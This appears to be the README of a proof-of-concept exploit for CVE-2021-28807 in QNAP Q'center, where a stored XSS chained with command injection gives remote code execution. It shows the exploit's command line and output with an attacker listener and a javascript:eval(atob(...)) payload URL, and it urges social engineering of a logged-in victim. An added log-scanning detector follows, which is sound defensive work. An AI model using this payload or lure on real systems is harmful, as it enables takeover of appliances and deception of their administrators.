QNAP Q'center is affected by a stored XSS and a command injection vulnerability; chained together they lead to remote command execution once a logged-in victim opens the malicious URL.
Read more at:
- https://www.shielder.it/advisories/qnap-qcenter-virtual-stored-xss/
- https://www.shielder.it/advisories/qnap-qcenter-post-auth-remote-code-execution-via-qpkg/
- Clone this repo
- Run the exploit with the correct arguments, e.g.:

```
./CVE-2021-28807.py -ip 192.168.153.1 -port 9595 -victimip 192.168.153.128 -reflected y
```

- Use your favourite social engineering technique to make the logged-in victim open that URL :-)
```
$ \tmp\poc\CVE-2021-28807> python .\poc.py -ip 192.168.153.1 -port 9595 -victimip 192.168.153.128 -reflected y
[+] created in memory patch.qpkg
[+] created in memory QcenterServerVMAppPatch_1.12.1014 archive
Do you have open the listener on 192.168.153.1:9595 [Y/N]? Y
[+] creating the reflected-XSS payload
https://192.168.153.128/qcenter/redirect.html?redirect=javascript:eval(atob("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"));
```
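The payload URL above has a recognisable shape on the wire: a request to `/qcenter/redirect.html` whose `redirect` parameter carries a `javascript:` URL instead of a path. The following script, an added example that is not part of the PoC and not Shielder's or QNAP's code, shows how a defender can flag such requests in Q'center web access logs. The log lines are constructed for the example, and the combined-log-format layout is an assumption about how the appliance logs requests.

```python
"""Flag /qcenter/redirect.html requests whose `redirect` parameter carries a
javascript: URL, the shape of the reflected-XSS payload. Added example, not
part of the original PoC; the log lines below are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (assumed combined log format).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2021:10:00:01 +0000] "GET /qcenter/redirect.html?redirect=%2Fqcenter%2Fhome HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2021:10:00:07 +0000] "GET /qcenter/redirect.html?redirect=javascript:eval(atob(%22QUJD%22)) HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2021:10:00:09 +0000] "GET /qcenter/redirect.html?redirect=%6Aavascript%3Aalert(1) HTTP/1.1" 200 512
10.0.0.7 - - [12/May/2021:10:00:12 +0000] "GET /qcenter/index.html HTTP/1.1" 200 2048
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_script_redirect(target: str) -> bool:
    """True when the target is /qcenter/redirect.html and its redirect
    parameter, after URL-decoding, starts with a javascript: scheme.
    The comparison is case-insensitive and strips whitespace/control
    characters, mirroring how browsers normalise a scheme."""
    parts = urlsplit(target)
    if not parts.path.endswith("/qcenter/redirect.html"):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("redirect", []):
        # parse_qs already decodes once; decode again to catch double encoding.
        decoded = unquote(value)
        normalized = re.sub(r"[\s\x00-\x1f]", "", decoded).lower()
        if normalized.startswith("javascript:"):
            return True
    return False


def scan_log(text: str) -> list:
    """Return (client_ip, target) for each request carrying a javascript: redirect."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        if is_script_redirect(m.group("target")):
            hits.append((line.split(" ", 1)[0], m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"[!] javascript: redirect from {ip}: {target}")
```

Run it against a real log by replacing `SAMPLE_LOG` with the file contents; two of the four constructed lines are flagged, including the one that hides the scheme behind percent-encoding. A proper fix on the application side is to reject any `redirect` value that is not a relative path, which this check approximates from the log side.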
- zi0Black of Shielder for vulnerability discovery and exploit development.